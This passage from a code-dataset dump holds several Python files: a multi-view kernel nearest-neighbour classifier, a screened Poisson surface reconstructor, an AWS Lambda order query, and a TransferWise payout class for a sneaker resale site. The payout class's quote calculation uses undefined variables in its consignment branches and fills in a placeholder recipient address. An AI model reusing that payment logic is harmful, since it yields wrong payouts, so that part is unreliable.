计算K(Vc,Vc)的拉普拉斯矩阵\r\n# D = np.diag(np.sum(K_V_V, axis=1))\r\n# L_D = D - K_V_V\r\n# d_temp = fractional_matrix_power(D, -0.5)\r\n# L_M = d_temp.dot(L_D).dot(d_temp)\r\n# return 
L_M\r\n\r\n\r\nclass HSIC_GHKNN(BaseEstimator, ClassifierMixin):\r\n    def __init__(self, k_nn=2, lamda=0.5, gamma=0.5, beta=0.5, type='rbf', theta=1,\r\n                 show_bar=False):\r\n        '''\r\n\r\n        :param k_nn: k NearestNeighbors for each class\r\n        :param lamda: weight of the ridge (identity) regularisation term\r\n        :param gamma: kernel coefficient forwarded to pairwise_kernels\r\n        :param beta: weight of the graph-Laplacian regularisation term\r\n        :param type: kernel name forwarded to pairwise_kernels (e.g. 'rbf')\r\n        :param theta: weight of the cross-view (HSIC-style) coupling term\r\n        '''\r\n        self.k_nn = k_nn\r\n        self.lamda = lamda\r\n        self.gamma = gamma\r\n        self.beta = beta\r\n        self.type = type\r\n        self.theta = theta\r\n        self.show_bar = show_bar\r\n\r\n    def fit(self, X, y, multi_views=[[1, 1], [2, 2]]):\r\n        # Check that X and y have correct shape\r\n        X, y = check_X_y(X, y)\r\n        # Store the classes seen during fit\r\n        self.classes_ = unique_labels(y)\r\n        self.C_ = len(self.classes_)\r\n        self.X_ = X\r\n        self.y_ = y\r\n        self.temp_dict_ = {\r\n            \"score_f\": None,\r\n            \"test_X\": None,\r\n            \"pred_y\": None\r\n        }\r\n        self.multi_views_ = multi_views\r\n        self.V_ = len(self.multi_views_)\r\n\r\n        self.n_features_in_ = X.shape[1]\r\n        # Return the classifier\r\n        return self\r\n\r\n    def predict(self, X):\r\n        # Check if fit has been called\r\n        check_is_fitted(self, ['classes_', 'C_', 'X_', 'y_', 'temp_dict_'])\r\n        # Input validation\r\n        X = check_array(X)\r\n        if self.n_features_in_ != X.shape[1]:\r\n            raise ValueError(\"the number of features in predict() is different from the number of features in fit\")\r\n\r\n        if (X == self.temp_dict_[\"test_X\"]).all():\r\n            return self.temp_dict_[\"pred_y\"]\r\n        n_test = X.shape[0]\r\n        distance_s = np.zeros((n_test, self.C_))\r\n        number_c = np.zeros((self.C_, 1))\r\n        for i in range(self.C_):\r\n            # print(np.argwhere(self.y == self.classes[i]).flatten())\r\n            train_x_c = self.X_[np.argwhere(self.y_ == self.classes_[i]).flatten(), :]\r\n            n_c = train_x_c.shape[0]\r\n            number_c[i] = n_c\r\n\r\n            if self.k_nn >= n_c:\r\n                k_nn_i = n_c\r\n            else:\r\n                k_nn_i = self.k_nn\r\n            # use sklearn's NearestNeighbors to find the k nearest neighbours\r\n            nbrs = NearestNeighbors(n_neighbors=k_nn_i, algorithm='auto').fit(train_x_c)\r\n            indices = nbrs.kneighbors(X, return_distance=False)\r\n\r\n            dim_k = k_nn_i\r\n            matrics_H = np.eye(dim_k) - ((np.ones((dim_k, 1)).dot(np.ones((1, dim_k)))) / dim_k)\r\n\r\n            round = 0\r\n            for j in range(n_test):\r\n                # progress-bar display\r\n                if self.show_bar:\r\n                    print(\"\\r\", end=\"\")\r\n                    prct = int(((j + 1) / n_test) * 100)\r\n                    print(\"Class {}/{} , progress: {}/{} {}%: \".format(i + 1, self.C_, j + 1, n_test, prct),\r\n                          \"▋\" * (prct // 2), end=\"\")\r\n                    if j + 1 == n_test:\r\n                        print(\"\")\r\n                    sys.stdout.flush()\r\n\r\n                K_Vc_Vc_V = np.zeros((dim_k, dim_k, self.V_))  # k * k * V\r\n                K_Vc_x_V = np.zeros((dim_k, 1, self.V_))  # k*1 * V\r\n                L_M_V = np.zeros((dim_k, dim_k, self.V_))  # k * k * V\r\n                K_x_x_V = np.zeros((1, self.V_))  # 1 * V\r\n                alpha_V = np.zeros((dim_k, 1, self.V_))  # k*1 * V\r\n\r\n                for v in range(self.V_):\r\n                    # the N nearest-neighbour samples\r\n                    N_x_v = train_x_c[indices[j], (self.multi_views_[v][0] - 1):self.multi_views_[v][1]]\r\n                    # take the mean of each column as the final mean\r\n                    N_mu_v = np.mean(N_x_v, axis=0)\r\n                    Vc_v = N_x_v - N_mu_v  # numpy broadcasting is triggered automatically\r\n                    K_Vc_Vc_v = pairwise_kernels(Vc_v, Vc_v, metric=self.type, gamma=self.gamma, filter_params=True)\r\n                    nc_x_v = (X[j, (self.multi_views_[v][0] - 1):self.multi_views_[v][1]] - N_mu_v).reshape(1, -1)\r\n                    K_Vc_x_v = pairwise_kernels(Vc_v, nc_x_v, metric=self.type, gamma=self.gamma, filter_params=True)\r\n                    L_M_v, d = csgraph.laplacian(K_Vc_Vc_v, return_diag=True, normed=True)\r\n                    K_x_x_v = pairwise_kernels(nc_x_v, nc_x_v, metric=self.type, gamma=self.gamma, filter_params=True)\r\n\r\n                    K_Vc_Vc_V[:, :, v] = K_Vc_Vc_v\r\n                    K_Vc_x_V[:, :, v] = K_Vc_x_v\r\n                    L_M_V[:, :, v] = L_M_v\r\n                    K_x_x_V[:, v] = K_x_x_v\r\n
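                # Added note: the first pass solves each view independently as a\r\n                # regularised system alpha_v = (K_v + lamda*I + beta*L_v)^{-1} k_v;\r\n                # the theta-weighted cross-view coupling only enters the loop below.\r\n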
                for v in range(self.V_):  # the v-th view\r\n                    alpha_v = np.linalg.inv(\r\n                        K_Vc_Vc_V[:, :, v] + self.lamda * np.identity(dim_k) + self.beta * L_M_V[:, :, v]).dot(\r\n                        K_Vc_x_V[:, :, v])\r\n                    alpha_V[:, :, v] = alpha_v\r\n                # start iterating\r\n                round = 1\r\n                while 1:\r\n                    last_alpha_V = np.array(alpha_V)\r\n                    matric_GAMMA = np.zeros((dim_k, dim_k))  # running sum over all views' GAMMA terms\r\n                    matric_GAMMA_V = np.zeros((dim_k, dim_k, self.V_))  # the individual per-view GAMMA terms\r\n                    for v in range(self.V_):  # the v-th view\r\n                        matric_GAMMA_v = matrics_H.dot(alpha_V[:, :, v]).dot(alpha_V[:, :, v].T).dot(\r\n                            matrics_H)  # one GAMMA term before summation\r\n                        matric_GAMMA_V[:, :, v] = matric_GAMMA_v  # cache it to reduce the computational cost\r\n                    matric_GAMMA = np.sum(matric_GAMMA_V, 2)  # sum of all the per-view GAMMA terms\r\n\r\n                    # update alpha_V\r\n                    for v in range(self.V_):\r\n                        GAMMA_v = matric_GAMMA - matric_GAMMA_V[:, :, v]  # GAMMA_v: the total minus this view's own term\r\n                        alpha_v = np.linalg.inv(\r\n                            K_Vc_Vc_V[:, :, v] + self.lamda * np.identity(dim_k) +\r\n                            self.beta * L_M_V[:, :, v] + self.theta * GAMMA_v) \\\r\n                            .dot(K_Vc_x_V[:, :, v])\r\n                        alpha_V[:, :, v] = alpha_v\r\n                    if (round != 1 and np.linalg.norm(last_alpha_V - alpha_V) < 0.01 * np.linalg.norm(last_alpha_V)) \\\r\n                            or round >= 5:\r\n                        #print(round)\r\n                        break\r\n                    round += 1\r\n\r\n                dis_V = np.zeros((1, self.V_))\r\n                for v in range(self.V_):\r\n                    dis_V[:, v] = np.real(np.sqrt(K_x_x_V[:, v]\r\n                                                  - 2 * K_Vc_x_V[:, :, v].T.dot(alpha_V[:, :, v])\r\n                                                  + alpha_V[:, :, v].T.dot(K_Vc_Vc_V[:, :, v]).dot(alpha_V[:, :, v])))\r\n                distance_s[j, i] = np.mean(dis_V)\r\n\r\n        y_pred = self.classes_[distance_s.argmin(1)]\r\n        sum_s = np.sum(distance_s, axis=1).reshape(-1, 1) - distance_s\r\n        with np.errstate(divide='ignore', invalid='ignore'):\r\n            score_f = sum_s / np.sum(sum_s, axis=1).reshape(-1, 1)\r\n\r\n        self.temp_dict_[\"score_f\"] = score_f\r\n        # noinspection PyTypedDict\r\n        self.temp_dict_[\"test_X\"] = X\r\n        self.temp_dict_[\"pred_y\"] = y_pred\r\n\r\n        return y_pred\r\n\r\n    def predict_proba(self, X):\r\n        # Check if fit has been called\r\n        check_is_fitted(self, ['classes_', 'C_', 'X_', 'y_', 'temp_dict_'])\r\n        # Input validation\r\n        X = check_array(X)\r\n        if self.n_features_in_ != X.shape[1]:\r\n            raise ValueError(\r\n                \"the number of features in predict_proba() is different from the number of features in fit\")\r\n        if (X == self.temp_dict_[\"test_X\"]).all():\r\n            return self.temp_dict_[\"score_f\"]\r\n        else:\r\n            self.predict(X)\r\n            return self.temp_dict_[\"score_f\"]\r\n\r\n\r\nif __name__ == \"__main__\":\r\n    from sklearn.utils.estimator_checks import check_estimator\r\n\r\n    check_estimator(HSIC_GHKNN())\r\n","repo_name":"ferryvan/HSIC_GHKNN","sub_path":"HSIC_GHKNN.py","file_name":"HSIC_GHKNN.py","file_ext":"py","file_size_in_byte":8670,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"25975555909","text":"from typing import Union\n\nimport jittor as jt\nimport torch\nimport torch_scatter\nimport numpy as np\nfrom jspsr.core.hashtree import HashTree, VoxelStatus\nfrom jspsr.bases.abc import BaseBasis\nfrom jspsr.core.ops import screened_multiplication, marching_cubes_op, marching_cubes, torch_unique\nfrom jspsr.ext import CuckooHashTable\nfrom jspsr.core.solver import solve_sparse\n\n\nclass ScreeningData:\n    \"\"\"\n    Sparse matrix representation (Num-pts x Num-vx)\n    \"\"\"\n    def __init__(self, pts_ids, vx_ids, values, nb_sizes):\n        self.pts_ids = pts_ids\n        self.vx_ids = vx_ids\n        self.values = values\n        self.nb_sizes = nb_sizes\n\n\nclass Reconstructor:\n    def __init__(self, hash_tree: HashTree, basis: BaseBasis, feat: 
dict = None):\n \"\"\"\n Screened Poisson reconstructor class.\n :param hash_tree: The tree containing the octree structure as well as input points\n :param basis: basis function to use\n :param feat: dict that maps from integer depth to torch features, used only when basis needs features.\n \"\"\"\n self.hash_tree = hash_tree\n self.fixed_level_set = None\n self.branch = hash_tree.DECODER\n\n self.basis = basis\n self.solutions = {}\n self.sample_weight = None\n\n # Initialize basis feature if not provided.\n if feat is None:\n feat = {}\n for d in range(hash_tree.depth):\n feat[d] = torch.zeros(\n (hash_tree.get_coords_size(self.branch, d),\n basis.get_feature_size()), device=hash_tree.device)\n basis.initialize_feature_value(feat[d])\n self.grid_features = feat\n\n def set_fixed_level_set(self, value):\n \"\"\"\n Originally level set is determined by computing mean(chi(input)), this function allows you to\n manually specify that\n :param value: level set value\n \"\"\"\n self.fixed_level_set = value\n\n @classmethod\n def _evaluate_screening_term(cls, data_a: ScreeningData, data_b: ScreeningData,\n domain_a, domain_b, pts_weight=None):\n if domain_a.size(0) == 0 or domain_b.size(0) == 0:\n return torch.zeros((0, ), device=domain_a.device)\n\n if pts_weight is None:\n pts_weight = torch.ones((data_a.nb_sizes.size(0), ), device=domain_a.device)\n elif isinstance(pts_weight, float):\n pts_weight = torch.full((data_a.nb_sizes.size(0), ), fill_value=pts_weight, dtype=torch.float32,\n device=domain_a.device)\n\n domain_table = CuckooHashTable(torch.stack([domain_a, domain_b], dim=1), enlarged=True)\n term_res = screened_multiplication(domain_table.object,\n data_a.values, data_b.values,\n data_a.vx_ids, data_b.vx_ids,\n data_a.nb_sizes, data_b.nb_sizes, pts_weight)\n\n return term_res\n\n def solve_multigrid(self, start_depth, end_depth, normal_data: dict,\n screen_alpha: Union[float, torch.Tensor] = 0.0, screen_xyz: torch.Tensor = None,\n screen_delta: Union[float, torch.Tensor] = 0.1,\n solver: str = \"pcg\", verbose: bool = True):\n \"\"\"\n Build and solve the linear system L alpha = d, using our coarse-to-fine solver.\n Note that the full V-cycle is not supported in this repo. Normal is however not smoothed\n because empirically we've found no difference.\n The energy function defined in our paper is solver within a truncated domain, with\n explicit dirichlet constraints that the boundary evaluates to 0. We choose not to eliminate\n such constraints because that will introduce many heterogeneous integral computations on\n the boundary.\n :param start_depth: int, the coarsest level for the solver\n :param end_depth: int, the finest level for the solver\n :param normal_data: dictionary that maps from depth to splatted normal data (x, 3)\n :param screen_alpha: float or Tensor. Weight of the screening term\n :param screen_xyz: None or Tensor. positional constraints to the system.\n :param screen_delta: float or Tensor. 
Target scalar value as described in the paper.\n :param solver: you can choose from 'cholmod' or 'pcg' or 'mixed'.\n :param verbose: Output debug information during solve.\n \"\"\"\n if isinstance(screen_alpha, torch.Tensor):\n assert screen_xyz is not None, \"Must provide points to be screened.\"\n assert screen_alpha.size(0) == screen_xyz.size(0)\n should_screen = True\n else:\n should_screen = screen_alpha > 0.0\n\n self.solutions = {}\n neighbour_range = 2 * self.basis.get_domain_range() - 1\n\n # Basis pre-evaluation for screening term.\n screen_data = {}\n if should_screen:\n base_coords = screen_xyz / self.hash_tree.voxel_size - 0.5\n for d in range(end_depth, start_depth + 1):\n pts_ids, vx_ids, tgt_offsets, nb_sizes = self.hash_tree.get_neighbours_data(\n base_coords, 1, d, self.hash_tree.get_range_kernel(self.basis.get_domain_range()),\n self.branch, transposed=True)\n query_coords = -tgt_offsets / self.hash_tree.get_stride(self.branch, d)\n query_val = self.basis.evaluate(feat=self.grid_features[d], xyz=query_coords, feat_ids=vx_ids)\n screen_data[d] = ScreeningData(pts_ids, vx_ids, query_val, nb_sizes)\n\n for d in range(start_depth, end_depth - 1, -1):\n screen_factor = (1 / 4.) ** d\n\n # Build RHS:\n rhs_val = 0\n for data_depth, depth_normal_data in normal_data.items():\n normal_ids, tree_ids, normal_offset, _ = self.hash_tree.get_neighbours(\n data_depth, d,\n self.basis.get_domain_range(),\n self.branch)\n partial_sums = self.basis.integrate_const_deriv_product(\n data=-depth_normal_data[normal_ids],\n target_feat=self.grid_features[d],\n rel_pos=normal_offset,\n data_stride=self.hash_tree.get_stride(self.branch, data_depth),\n target_stride=self.hash_tree.get_stride(self.branch, d),\n target_ids=tree_ids\n )\n rhs_val += torch_scatter.scatter_add(\n partial_sums, tree_ids, dim=0, dim_size=self.hash_tree.get_coords_size(self.branch, d))\n\n if should_screen:\n if isinstance(screen_alpha, torch.Tensor) or isinstance(screen_delta, torch.Tensor):\n mult = (screen_delta * screen_alpha)[screen_data[d].pts_ids]\n else:\n mult = screen_alpha * screen_delta\n rhs_val += screen_factor * torch_scatter.scatter_sum(\n screen_data[d].values * mult,\n screen_data[d].vx_ids, dim_size=self.hash_tree.get_coords_size(self.branch, d)\n )\n\n # Correction:\n for dd in range(start_depth, d, -1):\n src_ids, tgt_ids, rel_pos, _ = self.hash_tree.get_neighbours(\n d, dd, target_range=neighbour_range, branch=self.branch)\n a_d_dd_val = self.basis.integrate_deriv_deriv_product(\n source_feat=self.grid_features[d],\n target_feat=self.grid_features[dd],\n rel_pos=rel_pos,\n source_stride=self.hash_tree.get_stride(self.branch, d),\n target_stride=self.hash_tree.get_stride(self.branch, dd),\n source_ids=src_ids, target_ids=tgt_ids)\n if should_screen:\n a_d_dd_val = a_d_dd_val + screen_factor * self._evaluate_screening_term(\n screen_data[d], screen_data[dd], src_ids, tgt_ids, screen_alpha)\n rhs_val -= torch_scatter.scatter_sum(self.solutions[dd][tgt_ids] * a_d_dd_val,\n src_ids, dim_size=rhs_val.size(0))\n\n # Build LHS:\n src_ids, tgt_ids, rel_pos, _ = self.hash_tree.get_neighbours(d, d, target_range=neighbour_range,\n branch=self.branch)\n lhs_val = self.basis.integrate_deriv_deriv_product(\n source_feat=self.grid_features[d],\n target_feat=self.grid_features[d],\n rel_pos=rel_pos,\n source_stride=self.hash_tree.get_stride(self.branch, d),\n target_stride=self.hash_tree.get_stride(self.branch, d),\n source_ids=src_ids, target_ids=tgt_ids)\n\n if should_screen:\n lhs_val = lhs_val + screen_factor * 
self._evaluate_screening_term(\n screen_data[d], screen_data[d], src_ids, tgt_ids, screen_alpha)\n\n if solver == \"mixed\":\n cur_solver = \"mixed\" if d == end_depth else \"cholmod\"\n else:\n cur_solver = solver\n self.solutions[d] = solve_sparse(src_ids, tgt_ids, lhs_val, rhs_val, cur_solver)\n\n # Dump residual for comparison\n if verbose:\n residual = torch_scatter.scatter_sum(self.solutions[d][tgt_ids] * lhs_val, src_ids,\n dim_size=rhs_val.size(0)) - rhs_val\n print(f\"Solving complete at level {d}, residual = {torch.linalg.norm(residual).item()}.\")\n\n def evaluate_raw_chi(self, xyz: torch.Tensor, compute_mask: bool = False,\n compute_grad: bool = False, depths: list = None):\n \"\"\"\n Evaluate the chi value at (x,y,z)\n :param depths: visualize only the depth in the list, default is None\n :param compute_grad: whether to compute gradient of the field\n :param xyz: torch.Tensor (N x 3). metric-space positions\n :param compute_mask: bool for debugging purpose\n :return: (N,) chi value.\n \"\"\"\n assert len(self.solutions) > 0, \"Please run solver before evaluation.\"\n\n sdf_vals = 0\n sdf_mask = torch.zeros((xyz.size(0), ), dtype=bool, device=xyz.device) if compute_mask else None\n for level_d, level_solution in self.solutions.items():\n if depths is not None and level_d not in depths:\n continue\n\n sdf_val = self.hash_tree.evaluate_interpolated(\n xyz, self.basis, self.grid_features[level_d], level_d, level_solution,\n compute_mask, compute_grad=compute_grad)\n if compute_mask:\n sdf_vals += sdf_val[0]\n sdf_mask = torch.logical_or(sdf_mask, sdf_val[1])\n else:\n sdf_vals += sdf_val\n\n if compute_mask:\n return sdf_vals, sdf_mask\n return sdf_vals\n\n def get_mean_chi(self):\n if self.fixed_level_set is not None:\n return self.fixed_level_set\n sdf_surface = self.evaluate_raw_chi(self.hash_tree.xyz)\n if self.sample_weight is None:\n print(\"Warning: Sample weight not set.\")\n return torch.mean(sdf_surface)\n else:\n return torch.sum(sdf_surface * self.sample_weight) / torch.sum(self.sample_weight)\n\n def evaluate_chi(self, xyz: torch.Tensor, compute_mask: bool = False, max_points: int = -1, depths: list = None):\n \"\"\"\n Evaluate the implicit field value, possibly with chunking\n \"\"\"\n mean_chi = self.get_mean_chi()\n\n n_chunks = int(np.ceil(xyz.size(0) / max_points)) if max_points > 0 else 1\n xyz_chunks = torch.chunk(xyz, n_chunks)\n sdf_val_chunks = []\n\n for xyz in xyz_chunks:\n sdf_val = self.evaluate_raw_chi(xyz, compute_mask=compute_mask, depths=depths)\n sdf_val_chunks.append(sdf_val)\n\n if compute_mask:\n return torch.cat([t[0] for t in sdf_val_chunks]) - mean_chi, torch.cat([t[1] for t in sdf_val_chunks])\n\n return torch.cat(sdf_val_chunks) - mean_chi\n\n def extract_mesh(self, base_coords: torch.Tensor, chi_field: torch.Tensor, chi_depth: int, build_o3d_mesh: bool = True):\n \"\"\"\n Extract mesh at a specific depth, given densely-evaluated implicit function values.\n :param base_coords: coordinates of the evaluation point\n :param chi_field: sampled implicit function values\n :param chi_depth: int, depth of the mesh extraction\n :param build_o3d_mesh: whether to use Open3D to build TriangleMesh\n :return: o3d.geometry.TriangleMesh or (vertices Vx3, triangles Tx3, normals Vx3)\n \"\"\"\n scale = self.hash_tree.get_stride(self.branch, chi_depth)\n\n # Extract mesh.\n num_lif = base_coords.size(0)\n chi_resolution = chi_field.size(0) // num_lif\n chi_resolution = round(chi_resolution ** (1 / 3.))\n\n chi_field = chi_field.reshape(-1, chi_resolution, 
chi_resolution, chi_resolution)\n vertices, triangles, normals, _ = marching_cubes_op(\n base_coords.float() / scale, chi_field\n )\n vertices = vertices * (scale * self.hash_tree.voxel_size)\n\n if build_o3d_mesh:\n import open3d as o3d\n\n vertices = vertices.cpu().numpy().astype(float)\n triangles = triangles.cpu().numpy().astype(np.int32)\n normals = normals.cpu().numpy().astype(float)\n\n final_mesh = o3d.geometry.TriangleMesh()\n final_mesh.vertices = o3d.utility.Vector3dVector(vertices)\n final_mesh.vertex_normals = o3d.utility.Vector3dVector(normals)\n final_mesh.triangles = o3d.utility.Vector3iVector(triangles)\n\n return final_mesh\n\n else:\n return vertices, triangles, normals\n\n def extract_multiscale_mesh(self, n_upsample: int = 1, max_depth: int = 100, expand: int = 0, trim: bool = False,\n build_o3d_mesh: bool = True, max_points: int = -1):\n \"\"\"\n https://www.cs.rice.edu/~jwarren/papers/dmc.pdf\n (Possible extensions: Use hermite data to compute feature locations & Manifold dual marching cubes)\n :param n_upsample: samples within each primal grid.\n :param max_depth: maximum depth to extract\n :param expand: size of expansion for the tree, set to 3 to guarantee no information is lost.\n :param trim: whether to keep only leaf voxels\n :param build_o3d_mesh: bool whether to build Open3D mesh.\n :param max_points: int, maximum number of points.\n :return: (vertex, triangle) tuple or o3d.geometry.TriangleMesh\n \"\"\"\n max_depth = min(max_depth, self.hash_tree.depth)\n\n # Make tree\n conformal_primal_base = {}\n\n if trim:\n for d in range(max_depth):\n base_coords = self.hash_tree.get_coords(self.branch, d)\n coords_status = self.hash_tree.evaluate_voxel_status(self.branch, base_coords, d)\n conformal_primal_base[d] = base_coords[coords_status == VoxelStatus.VS_EXIST_STOP.value]\n else:\n # Make conformal tree (from fine to coarse) and filter all leaves\n conformal_mask = {}\n for d in range(max_depth):\n _, base_coords = self.hash_tree.get_test_grid(0, d, expand, conforming=d < max_depth - 1)\n # Keep only leaf nodes (by inspecting whether it has children)\n # Mask has to be applied next round, because the pruning of parents still need a full structure.\n if d > 0:\n children_table = CuckooHashTable(data=conformal_primal_base[d - 1])\n ol_mask = children_table.query(base_coords) == -1\n # No more nodes exist (including this layer)\n if not torch.any(ol_mask):\n max_depth = d\n break\n conformal_mask[d] = ol_mask\n conformal_primal_base[d] = base_coords\n for d in range(1, max_depth):\n conformal_primal_base[d] = conformal_primal_base[d][conformal_mask[d]]\n\n # Expand with the sample factor (build primal grids)\n expand_voxel_size = self.hash_tree.voxel_size / n_upsample\n expand_coords = torch.arange(0, n_upsample, dtype=torch.int, device=self.hash_tree.device)\n expand_coords = torch.stack(torch.meshgrid(expand_coords, expand_coords, expand_coords, indexing='ij'), dim=3)\n expand_coords = expand_coords.view(-1, 3)\n expand_primal_base = {}\n for d in range(max_depth):\n scale = self.hash_tree.get_stride(self.branch, d)\n b_d = conformal_primal_base[d] * n_upsample\n b_d = (b_d.unsqueeze(1) + (expand_coords * scale).unsqueeze(0)).view(-1, 3)\n expand_primal_base[d] = b_d # (N * n_upsample ** 3, 3)\n\n # Identify dual grids (iterate 8 corners of primal voxels)\n dual_centers = []\n for d in range(max_depth):\n scale = self.hash_tree.get_stride(self.branch, d)\n for offset in [(0, 0, 0), (0, 0, 1), (0, 1, 0), (0, 1, 1), (1, 0, 0), (1, 0, 1), (1, 1, 0), (1, 1, 1)]:\n 
dual_centers.append(expand_primal_base[d] + torch.tensor(\n                    offset, dtype=torch.int32, device=self.hash_tree.device) * scale)\n        dual_centers = torch.cat(dual_centers, 0)\n        dual_centers = torch_unique(dual_centers, dim=0)    # (DC, 3)\n\n        # Populate and filter incomplete dual grids. (DC, 8, 2 = depth + inds)\n        dual_centers_table = CuckooHashTable(data=dual_centers)\n        acc_inds, acc_inds_count = marching_cubes.dual_marching_cubes_indices(\n            dual_centers_table.object, expand_primal_base,\n            {d: self.hash_tree.get_stride(self.branch, d) for d in range(max_depth)},\n            {d: sum([expand_primal_base[dd].size(0) for dd in range(d)]) for d in range(max_depth)})\n        acc_inds = acc_inds[acc_inds_count == 8]\n\n        # Obtain dual corners (assumed to be primal centers) and evaluate them\n        dual_corners = []\n        dual_values = []\n        for d in range(max_depth):\n            dc_coords = (expand_primal_base[d] + self.hash_tree.get_stride(self.branch, d)) * expand_voxel_size\n            dual_corners.append(dc_coords)\n            dual_values.append(self.evaluate_chi(dc_coords, max_points=max_points))\n        dual_corners = torch.cat(dual_corners, 0)\n        dual_values = torch.cat(dual_values, 0)\n\n        # Marching cubes on dual grids.\n        tris, vert_ids = marching_cubes.dual_marching_cubes_sparse(acc_inds, dual_corners, dual_values)\n        unq, triangles = torch_unique(vert_ids.view(-1, 2), dim=0, return_inverse=True)\n        vertices = torch.empty((unq.size(0), 3), device=vert_ids.device)\n        vertices[triangles] = tris.view(-1, 3)\n        triangles = triangles.view(-1, 3)\n\n        if build_o3d_mesh:\n            import open3d as o3d\n\n            vertices = vertices.cpu().numpy().astype(float)\n            triangles = triangles.cpu().numpy().astype(np.int32)\n\n            final_mesh = o3d.geometry.TriangleMesh()\n            final_mesh.vertices = o3d.utility.Vector3dVector(vertices)\n            final_mesh.triangles = o3d.utility.Vector3iVector(triangles)\n\n            return final_mesh\n        else:\n            return vertices, triangles\n","repo_name":"huangjh-pub/neural-galerkin","sub_path":"jspsr/core/reconstructor.py","file_name":"reconstructor.py","file_ext":"py","file_size_in_byte":19561,"program_lang":"python","lang":"en","doc_type":"code","stars":76,"dataset":"github-code","pt":"51"} +{"seq_id":"22724298050","text":"\nimport boto3\nimport json\nimport logging\nimport os\nimport order\nfrom order import Order\nfrom boto3.dynamodb.conditions import Key, Attr\n\ntableName = os.environ['TABLE_NAME']\ndynamo = boto3.resource('dynamodb')\n\nlogger = logging.getLogger()\nlogger.setLevel(logging.INFO)\n\ndef lambda_handler(event, context):\n    logger.info(event)\n\n    size = 10\n    if 'size' in event.keys():\n        size = event['size']\n\n    status = ''\n    if 'status' in event.keys():\n        status = event['status']\n\n    page = 0\n    if 'page' in event.keys():\n        page = event['page']\n\n    sortKey = 'created_on'\n    if 'sortKey' in event.keys():\n        sortKey = event['sortKey']\n\n    asc = True\n    if 'asc' in event.keys():\n        asc = event['asc'] == '1'\n\n    return query_orders(status, page, size, sortKey, asc)\n\n\ndef query_orders(status, page, size, sortKey, asc):\n    table = dynamo.Table(tableName)\n    response = table.query(\n        IndexName='statusIndex',\n        KeyConditionExpression=Key('orderStatus').eq(status)\n    )\n    logger.info(response)\n    items = response['Items']\n    orders = []\n\n    for item in items:\n        orders.append(Order.from_json(item).to_item())\n\n    logger.info(orders)\n\n    return 
orders\n\n\n","repo_name":"MaikBluemel/aJourneyToServerlessComputing","sub_path":"backend/getOrders.py","file_name":"getOrders.py","file_ext":"py","file_size_in_byte":1215,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"35205976184","text":"import os\nimport requests\nimport json\nfrom mrsneaker_main.models import Account, Order, Bank, product_reserve, fees, Card, Shipping, open_offer\n\n\n\nimport OpenSSL\nfrom OpenSSL import crypto\nimport base64\n\n\nclass InternationalPayment:\n\n def __init__(self):\n\n self.quote_id = None\n self.customer_id = None\n self.transfer_id = None\n self.API_TOKEN = ''\n self.profile = ''\n self.order = None\n\n def order_type(self,order):\n\n order_number = ''\n\n if order.sell_sneakers == True:\n order_number = 'MRR' + order.order_number[1:]\n\n if order.consign_sneakers == True:\n order_number = 'MRC' + order.order_number[1:]\n\n return order_number\n\n\n\n def create_quote(self,currency_code,order):\n\n fee_objects = fees.objects.all()\n fee_object = fee_objects.last()\n\n transaction_fee = (float(order.price) / 100) * float(fee_object.transaction_fee)\n processing_fee = (float(order.price) / 100) * float(fee_object.processing_fee)\n\n if currency_code == 'USD':\n\n if order.consign_sneakers == True:\n price = (float(order.price) / 100)\n price = float(payout * 80.0)\n p = (0.35 / 100) * p\n price = float(float(price) + p + 0.35)\n\n else:\n\n p = float(order.price)\n p = (0.35 / 100) * p\n price = float(float(order.price) + p + 0.35)\n\n if currency_code == 'EUR':\n\n if order.consign_sneakers == True:\n price = (float(order.price) / 100)\n price = float(payout * 80.0)\n p = (0.35 / 100) * p\n price = float(float(price) + p + 0.20)\n\n\n\n else:\n p = float(order.price)\n p = (0.35 / 100) * p\n price = float(float(order.price) + p + 0.20)\n\n\n\n\n\n\n\n\n url = 'https://api.transferwise.com/v2/quotes'\n\n data = {\n \"sourceCurrency\": \"GBP\",\n \"targetCurrency\": currency_code,\n \"sourceAmount\": price,\n \"targetAmount\": None,\n \"profile\": self.profile,\n }\n\n\n data = json.dumps(data)\n\n result = requests.post(url,\n headers={'Content-Type':'application/json',\n 'Authorization': 'Bearer {}'.format(self.API_TOKEN)}, data = data)\n\n\n\n data = json.loads(result.text)\n quote_id = data['id']\n\n self.quote_id = quote_id\n self.order = order\n\n print('QUOTE CREATED')\n\n\n\n def create_recipient(self,currency_code,bank,user):\n\n shipping = Shipping.objects.all().filter(email = user.email).first()\n\n if shipping.country == 'United States':\n\n data = {\n \"profile\": self.profile,\n \"accountHolderName\": user.first_name + ' ' + user.last_name,\n \"currency\": currency_code,\n \"type\": \"aba\",\n \"details\": {\n \"legalType\": \"PRIVATE\",\n \"abartn\": bank.routing_number,\n \"accountNumber\": bank.account_number,\n \"accountType\": \"CHECKING\",\n \"address\": {\n \"country\": \"GB\",\n \"city\": \"London\",\n \"postCode\": \"10025\",\n \"firstLine\": \"50 Branson Ave\"\n }\n }\n\n }\n\n else:\n\n data = {\n \"profile\": self.profile,\n \"accountHolderName\": user.first_name + ' ' + user.last_name,\n \"currency\": currency_code,\n \"type\": \"iban\",\n \"details\": {\n \"legalType\": \"PRIVATE\",\n \"iban\": bank.iban,\n \"address\": {\n \"country\": \"GB\",\n \"city\": \"London\",\n \"postCode\": \"10025\",\n \"firstLine\": \"50 Branson Ave\"\n }\n }\n\n }\n\n\n data = json.dumps(data)\n\n url = 'https://api.transferwise.com/v1/accounts'\n\n result = requests.post(url,\n 
